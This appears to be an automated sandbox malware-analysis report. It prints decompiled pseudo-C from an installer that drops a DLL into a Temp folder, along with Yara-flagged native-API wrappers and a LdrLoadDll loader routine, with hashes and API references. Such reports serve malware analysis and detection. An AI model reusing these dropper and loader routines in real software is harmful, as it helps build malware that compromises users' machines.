                                                                          				_t11 = __ebx;
                                                                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                          					_t7 = lstrlenA(E00402A9A(0x11));
                                                                          				} else {
                                                                          					E00402A7D(1);
                                                                          					 *0x40a018 = __al;
                                                                          				}
                                                                          				if( *_t15 == _t11) {
                                                                          					L8:
                                                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                          				} else {
                                                                          					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", _t7, _t17 + 8, _t11);
                                                                          					_t21 = _t5;
                                                                          					if(_t21 == 0) {
                                                                          						goto L8;
                                                                          					}
                                                                          				}
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                                                          				return 0;
                                                                          			}


                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll, xrefs: 00402548, 0040256D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: FileWritelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
                                                                          • API String ID: 427699356-2857477325
                                                                          • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                          • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                          • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                          • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405513(char* _a4) {
                                                                          				char* _t3;
                                                                          				char* _t4;
                                                                          
                                                                          				_t4 = _a4;
                                                                          				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                          				while( *_t3 != 0x5c) {
                                                                          					_t3 = CharPrevA(_t4, _t3);
                                                                          					if(_t3 > _t4) {
                                                                          						continue;
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                                          				return _t3;
                                                                          			}


                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-1669384263
                                                                          • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                          • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                          • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405624(CHAR* _a4, CHAR* _a8) {
                                                                          				int _t10;
                                                                          				int _t15;
                                                                          				CHAR* _t16;
                                                                          
                                                                          				_t15 = lstrlenA(_a8);
                                                                          				_t16 = _a4;
                                                                          				while(lstrlenA(_t16) >= _t15) {
                                                                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                          					_t10 = lstrcmpiA(_t16, _a8);
                                                                          					if(_t10 == 0) {
                                                                          						return _t16;
                                                                          					}
                                                                          					_t16 = CharNextA(_t16);
                                                                          				}
                                                                          				return 0;
                                                                          			}


                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                          • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                          • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Executed Functions

                                                                          C-Code - Quality: 21%
                                                                          			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                          				intOrPtr _t13;
                                                                          				char* _t6;
                                                                          				char* _t12;
                                                                          				void* _t18;
                                                                          				void* _t27;
                                                                          				intOrPtr* _t28;
                                                                          
                                                                          				asm("in al, dx");
                                                                          				_t13 = _a4;
                                                                          				_t28 = _a4 + 0xc48; // slot in the context structure (_a4) that holds the function pointer called below
                                                                          				E00418DC0(_t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // same helper precedes every native call in this section; its body is not shown here
                                                                          				_t6 =  &_a32; // 0x413d52
                                                                          				_t12 =  &_a8; // 0x413d52
                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t27); // executed: indirect call through *_t28, resolved as NtReadFile in the APIs list below
                                                                          				return _t18;
                                                                          			}


                                                                          APIs
                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: R=A$R=A
                                                                          • API String ID: 2738559852-3742021989
                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                          • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 21%
                                                                          			E00418272() {
                                                                          				intOrPtr _t13;
                                                                          				intOrPtr* _t6;
                                                                          				intOrPtr* _t12;
                                                                          				void* _t18;
                                                                          				void* _t27;
                                                                          				intOrPtr* _t28;
                                                                          				void* _t30; // stack frame base; this is the same routine as E00418270, decompiled from 0x00418272 with frame-relative argument access
                                                                          
                                                                          				asm("in al, dx");
                                                                          				_t13 =  *((intOrPtr*)(_t30 + 8)); // first argument (the context structure)
                                                                          				_t28 =  *((intOrPtr*)(_t30 + 8)) + 0xc48; // slot holding the function pointer called below
                                                                          				E00418DC0(_t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // same helper precedes every native call in this section; its body is not shown here
                                                                          				_t6 = _t30 + 0x24; // 0x413d52
                                                                          				_t12 = _t30 + 0xc; // 0x413d52
                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)),  *((intOrPtr*)(_t30 + 0x1c)),  *((intOrPtr*)(_t30 + 0x20)),  *_t6,  *((intOrPtr*)(_t30 + 0x28)),  *((intOrPtr*)(_t30 + 0x2c)), _t27); // executed: indirect call through *_t28, resolved as NtReadFile in the APIs list below
                                                                          				return _t18;
                                                                          			}


                                                                          APIs
                                                                          • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID: R=A$R=A
                                                                          • API String ID: 2738559852-3742021989
                                                                          • Opcode ID: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction ID: 6f26a84ed9cee7b9b307b3f66eeb50f96d6269818b5e914aefad87f60d68ad55
                                                                          • Opcode Fuzzy Hash: 9340c6c6844d71d3a21144cda5ee9e2f0de6c4e07406845e5e07d3b7f5dffe66
                                                                          • Instruction Fuzzy Hash: 0BF0B7B2200108AFCB14DF99DC80EEB77A9EF9C354F158649FA1DD7241DA30E851CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                          				char* _v8;
                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                          				char _v536;
                                                                          				void* _t15;
                                                                          				struct _OBJDIR_INFORMATION _t17;
                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                          				void* _t30;
                                                                          				void* _t31;
                                                                          				void* _t32;
                                                                          
                                                                          				_v8 =  &_v536;
                                                                          				_t15 = E0041AB50( &_v12, 0x104, _a8);
                                                                          				_t31 = _t30 + 0xc;
                                                                          				if(_t15 != 0) {
                                                                          					_t17 = E0041AF70(__eflags, _v8);
                                                                          					_t32 = _t31 + 4;
                                                                          					__eflags = _t17;
                                                                          					if(_t17 != 0) {
                                                                          						_push(0);
                                                                          						_push( &_v12);
                                                                          						E0041B1F0();
                                                                          						_t32 = _t32 + 8;
                                                                          					}
                                                                          					_t18 = E00419300(_v8);
                                                                          					_v16 = _t18;
                                                                          					__eflags = _t18;
                                                                          					if(_t18 == 0) {
                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                          						return _v16;
                                                                          					}
                                                                          					return _t18;
                                                                          				} else {
                                                                          					return _t15;
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                          • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                          				intOrPtr _t3;
                                                                          				long _t21;
                                                                          
                                                                          				_t3 = _a4 + 0xc40; // 0xc40: slot in the context structure for this wrapper
                                                                          				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28); // same helper precedes every native call in this section; its body is not shown here
                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                          				return _t21;
                                                                          			}


                                                                          APIs
                                                                          • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                          • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                          				intOrPtr _t3;
                                                                          				long _t14;
                                                                          
                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                          				E00418DC0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30); // same helper precedes every native call in this section; its body is not shown here
                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                          				return _t14;
                                                                          			}


                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                          • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004182F0(intOrPtr _a4, void* _a8) {
                                                                          				intOrPtr _t5;
                                                                          				intOrPtr* _t2;
                                                                          				intOrPtr _t3;
                                                                          				long _t8;
                                                                          
                                                                          				_t5 = _a4;
                                                                          				_t2 = _t5 + 0x10; // 0x300
                                                                          				_t3 = _t5 + 0xc50; // 0x409743
                                                                          				E00418DC0(_a4, _t3,  *_t2, 0, 0x2c); // same helper precedes every native call in this section; its body is not shown here
                                                                          				_t8 = NtClose(_a8); // executed
                                                                          				return _t8;
                                                                          			}


                                                                          APIs
                                                                          • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                          • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                          • Instruction ID: ca347d956d130fc28e9bf3ecbfcfc175f6ca726f6af44adc79914e3c3c1641a5
                                                                          • Opcode Fuzzy Hash: 55af104e65493959a3b045fc209df0a4fc67bea0fd4d261e75c82f7522778e97
                                                                          • Instruction Fuzzy Hash: 3290026160500502D30171694404B16000A97D0381F92C036A1114595ECA658992F171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.249147160.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E00409B13(intOrPtr* __eax, intOrPtr* __edx, void* __esi, void* __eflags, intOrPtr _a8, char _a1351286606) {
                                                                          				intOrPtr _v4;
                                                                          				struct _EXCEPTION_RECORD _v8;
                                                                          				struct _OBJDIR_INFORMATION _v12;
                                                                          				char _v536;
                                                                          				void* __ebp;
                                                                          				intOrPtr* _t19;
                                                                          				intOrPtr* _t20;
                                                                          				void* _t21;
                                                                          				void* _t22;
                                                                          
                                                                          				_t19 = __eax;
                                                                          				if(__eflags != 0) {
                                                                          					asm("aaa");
                                                                          					_a1351286606 = _a1351286606 - 1;
                                                                          					do {
                                                                          						 *_t19 =  *_t19 +  *((intOrPtr*)(_t19 + 1));
                                                                          						_t19 = _t19 - 1;
                                                                          						_t21 = _t21 - 1;
                                                                          					} while (_t21 != 0);
                                                                          					if(__esi > 1) {
                                                                          						_t20 = __edx;
                                                                          						_t22 = __esi - 1;
                                                                          						do {
                                                                          							 *_t20 =  *_t20 +  *((intOrPtr*)(_t20 + 1));
                                                                          							_t20 = _t20 + 1;
                                                                          							_t22 = _t22 - 1;
                                                                          						} while (_t22 != 0);
                                                                          					}
                                                                          					return _t19;
                                                                          				} else {
                                                                          					if(__eflags <= 0) {
                                                                          						L13:
                                                                          						__eax = E0041B1F0();
                                                                          						__esp = __esp + 8;
                                                                          						goto L14;
                                                                          					} else {
                                                                          						ss = __ebp;
                                                                          						 *0x557fc038 = __eax;
                                                                          						_push(__ebp);
                                                                          						__ebp = __esp;
                                                                          						__esp = __esp - 0x214;
                                                                          						__edx =  &_v12;
                                                                          						__eax =  &_v536;
                                                                          						_v8 =  &_v536;
                                                                          						__eax = E0041AB50( &_v12, 0x104, _a8);
                                                                          						__eflags = __eax;
                                                                          						if(__eflags != 0) {
                                                                          							__eax = _v8;
                                                                          							__eax = L0041AF70(__eflags, _v8);
                                                                          							__eflags = __eax;
                                                                          							if(__eax != 0) {
                                                                          								_push(0);
                                                                          								_push( &_v12);
                                                                          								goto L13;
                                                                          							}
                                                                          							L14:
                                                                          							__edx = _v4;
                                                                          							__eax = E00419300(_v4);
                                                                          							_v12 = __eax;
                                                                          							__eflags = __eax;
                                                                          							if(__eax == 0) {
                                                                          								__edx = _a8;
                                                                          								 &_v12 =  *((intOrPtr*)(_a8 + 8));
                                                                          								__eax = LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                                                          								__eax = _v12;
                                                                          							}
                                                                          							__esp = __ebp;
                                                                          							_pop(__ebp);
                                                                          							return __eax;
                                                                          						} else {
                                                                          							__esp = __ebp;
                                                                          							_pop(__ebp);
                                                                          							return __eax;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          			}

                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                          Memory Dump Source
